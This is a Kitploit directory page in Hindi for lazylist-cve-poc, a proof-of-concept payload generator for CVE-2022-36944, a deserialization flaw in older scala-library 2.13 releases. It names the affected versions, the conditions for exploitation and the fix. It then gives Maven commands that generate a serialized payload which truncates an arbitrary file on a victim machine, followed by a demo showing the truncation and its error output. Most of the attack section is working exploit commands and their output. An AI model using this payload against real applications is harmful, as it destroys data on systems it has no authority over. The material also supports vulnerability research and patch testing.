Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
lazylist-cve-poc — CVE-2022-36944 भेद्यता शोषण के लिए POC | Kitploit
उपकरण/GitHubGitHub/yarocher/lazylist-cve-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाबाइनरी शोषण
GitHubyarocher/lazylist-cve-poc

lazylist-cve-poc

CVE-2022-36944 भेद्यता शोषण के लिए POC

रिपॉजिटरी देखें
111133 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-36944 पेलोड जनरेटर

यह मिनी-प्रोजेक्ट CVE-2022-36944 भेद्यता की प्रूफ ऑफ कॉन्सेप्ट प्रदर्शित करने के लिए बनाया गया है। यह ysoserial के समान है, लेकिन केवल इस CVE के लिए LazyList क्लास के साथ पेलोड उत्पन्न करता है।

त्वरित प्रश्नोत्तरी

कौन से आर्टिफैक्ट भेद्यता लाते हैं?

org.scala-lang:scala-library संस्करण 2.13.x जो 2.13.9 से पहले हैं

कौन से अनुप्रयोग असुरक्षित हैं?

आपके अनुप्रयोग को शोषण योग्य बनाने के लिए दो शर्तों को पूरा करना होगा:

  • आपके अनुप्रयोग के क्लासपाथ में असुरक्षित scala-library jar शामिल है
  • आपके अनुप्रयोग में कहीं पर ObjectInputStream#readObject() को अंततः कॉल किया जाता है और उसे अविश्वसनीय डेटा (हमलावर-नियंत्रित) दिया जाता है

भेद्यता कहाँ ठीक की गई थी?

scala PR देखें: #10118

बिल्ड

root@kitploit:~
mvn clean package

चलाएँ

निम्नलिखित कमांड stdout में पेलोड डंप करेगा जिसका उपयोग पीड़ित मशीन पर मनमानी फ़ाइल को छोटा (truncate) करने के लिए किया जा सकता है:

root@kitploit:~
mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="/file/to/truncate false"

डेमो

A) फ़ाइल के माध्यम से

  1. अंदर कुछ डेटा के साथ परीक्षण फ़ाइल तैयार करें:
root@kitploit:~
$ yes sometestdata > test_data
^C
$ head test_data 
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
sometestdata
  1. पेलोड उत्पन्न करें और इसे payload.ser फ़ाइल में सहेजें:
root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" > payload.ser
  1. पीड़ित प्रक्रिया चलाएँ (ClassCastException अपेक्षित है):
root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="payload.ser"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
  1. जाँच करें कि पीड़ित फ़ाइल छोटी हो गई है:
root@kitploit:~
$ head test_data 
$ 

B) पाइप से stdin में

चरण 2-3 को इस प्रकार जोड़ा जा सकता है (Victim के लिए फ़ाइल के रूप में "-" का उपयोग करें):

root@kitploit:~
$ mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.payload.Main" -Dexec.args="${PWD}/test_data false" | mvn -q exec:java -Dexec.mainClass="poc.cve.lazylist.victim.Victim" -Dexec.args="-"
[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.1.0:java (default-cli) on project lazylist-cve-poc: An exception occurred while executing the Java class. java.lang.ClassCastException: class java.io.FileOutputStream cannot be cast to class scala.collection.immutable.LazyList$State (java.io.FileOutputStream is in module java.base of loader 'bootstrap'; scala.collection.immutable.LazyList$State is in unnamed module of loader org.codehaus.mojo.exec.URLClassLoaderBuilder$ExecJavaClassLoader @72805168) -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
टूल डाउनलोड करें